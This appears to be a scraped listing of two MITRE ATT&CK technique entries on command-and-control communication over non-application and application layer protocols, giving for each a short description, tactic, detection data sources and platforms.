Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre